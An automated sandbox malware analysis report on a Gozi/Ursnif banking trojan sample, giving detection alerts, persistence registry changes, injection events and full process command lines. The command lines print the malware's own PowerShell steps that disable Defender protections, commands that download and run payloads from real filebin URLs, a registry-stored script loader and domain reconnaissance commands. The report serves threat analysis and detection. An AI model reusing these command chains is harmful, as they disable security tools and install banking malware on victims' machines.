Malware Analysis Report

2025-08-05 13:07

Sample ID 220322-r8mfyaceen
Target 6239dfea99c25.exe
SHA256 b6814794481de92b96493819677c96320d500487b82fd6eb72018faba8a831eb
Tags
persistence gozi_ifsb 3000 banker suricata trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b6814794481de92b96493819677c96320d500487b82fd6eb72018faba8a831eb

Threat Level: Known bad

The file 6239dfea99c25.exe was found to be: Known bad.

Malicious Activity Summary

persistence gozi_ifsb 3000 banker suricata trojan

suricata: ET MALWARE Ursnif Variant CnC Data Exfil

Gozi, Gozi IFSB

suricata: ET MALWARE Ursnif Variant CnC Beacon

suricata: ET MALWARE Ursnif Payload Request (cook32.rar)

suricata: ET MALWARE Ursnif Payload Request (cook64.rar)

suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)

Blocklisted process makes network request

Executes dropped EXE

Downloads MZ/PE file

Checks computer location settings

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Enumerates processes with tasklist

Runs net.exe

Runs ping.exe

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Gathers system information

Discovers systems in the same network

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-22 14:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-22 14:51

Reported

2022-03-22 14:55

Platform

win7-20220310-en

Max time kernel

4294180s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe

"C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe"

C:\Windows\system32\cmd.exe

cmd /c bruhad.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Add-MpPreference -ExclusionPath "C:\Users"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Invoke-WebRequest -uri https://filebin.net/ezig0gb1jw3em8r7/looad.exe -o looad.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\bruhad.bat

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms


Analysis: behavioral2

Detonation Overview

Submitted

2022-03-22 14:51

Reported

2022-03-22 14:55

Platform

win10v2004-en-20220113

Max time kernel

150s

Max time network

138s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

suricata: ET MALWARE Ursnif Payload Request (cook32.rar)

suricata

suricata: ET MALWARE Ursnif Payload Request (cook64.rar)

suricata

suricata: ET MALWARE Ursnif Variant CnC Beacon

suricata

suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)

suricata

suricata: ET MALWARE Ursnif Variant CnC Data Exfil

suricata

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1524 set thread context of 2688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2688 set thread context of 3544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 set thread context of 2296 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 2688 set thread context of 3840 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2296 set thread context of 2584 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2688 set thread context of 3272 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 set thread context of 1912 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1488 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe C:\Windows\SYSTEM32\cmd.exe
PID 1488 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe C:\Windows\SYSTEM32\cmd.exe
PID 1708 wrote to memory of 2252 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 2252 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 4524 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 4524 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 4712 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe
PID 1708 wrote to memory of 4712 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe
PID 4712 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe C:\Windows\system32\cmd.exe
PID 4712 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe C:\Windows\system32\cmd.exe
PID 1608 wrote to memory of 1816 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 1816 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 2932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 2932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 228 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 228 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 2956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 2956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 2332 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 2332 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1608 wrote to memory of 872 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe
PID 1608 wrote to memory of 872 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe
PID 1608 wrote to memory of 872 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe
PID 404 wrote to memory of 1524 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 404 wrote to memory of 1524 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1524 wrote to memory of 5048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1524 wrote to memory of 5048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 5048 wrote to memory of 4536 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 5048 wrote to memory of 4536 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1524 wrote to memory of 1816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1524 wrote to memory of 1816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1816 wrote to memory of 4216 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1816 wrote to memory of 4216 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1524 wrote to memory of 2688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1524 wrote to memory of 2688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1524 wrote to memory of 2688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1524 wrote to memory of 2688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2688 wrote to memory of 3544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 2296 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2296 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2296 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 3544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3840 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3840 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 2296 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2296 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 2296 wrote to memory of 2584 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2296 wrote to memory of 2584 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2296 wrote to memory of 2584 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2688 wrote to memory of 3840 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3840 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3272 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3272 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2296 wrote to memory of 2584 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2296 wrote to memory of 2584 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2688 wrote to memory of 3272 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 3272 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2688 wrote to memory of 4848 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2688 wrote to memory of 4848 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4848 wrote to memory of 220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe

"C:\Users\Admin\AppData\Local\Temp\6239dfea99c25.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c bruhad.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Add-MpPreference -ExclusionPath "C:\Users"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Invoke-WebRequest -uri https://filebin.net/ezig0gb1jw3em8r7/looad.exe -o looad.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe

looad.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\65BC.tmp\65BD.tmp\65BE.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Remove-MpThreat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Set-MpPreference -ExclusionExtension exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Add-MpPreference -ExclusionPath "C:\Users"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Set-MpPreference -MAPSReporting 0​"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -command "Set-MpPreference -SubmitSamplesConsent 2"​

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Invoke-WebRequest -uri https://filebin.net/ezig0gb1jw3em8r7/load.exe -o load.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe

load.exe

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Y03p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Y03p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3B357854-5E29-2581-409F-72297443C66D\\\PlayStop'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xadjxtwdw -value gp; new-alias -name lhnwkd -value iex; lhnwkd ([System.Text.Encoding]::ASCII.GetString((xadjxtwdw "HKCU:Software\AppDataLow\Software\Microsoft\3B357854-5E29-2581-409F-72297443C66D").StopLocal))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x3inmo35\x3inmo35.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2572.tmp" "c:\Users\Admin\AppData\Local\Temp\x3inmo35\CSCAD89A661A4034B56BD98BEBDC6FA94CA.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3kgaxgp0\3kgaxgp0.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES268C.tmp" "c:\Users\Admin\AppData\Local\Temp\3kgaxgp0\CSC6E24615EF38442F7BFB7EE57DB209138.TMP"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe"

C:\Windows\system32\PING.EXE

ping localhost -n 5

C:\Windows\system32\cmd.exe

cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\EE19.bi1"

C:\Windows\system32\nslookup.exe

nslookup myip.opendns.com resolver1.opendns.com

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EE19.bi1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

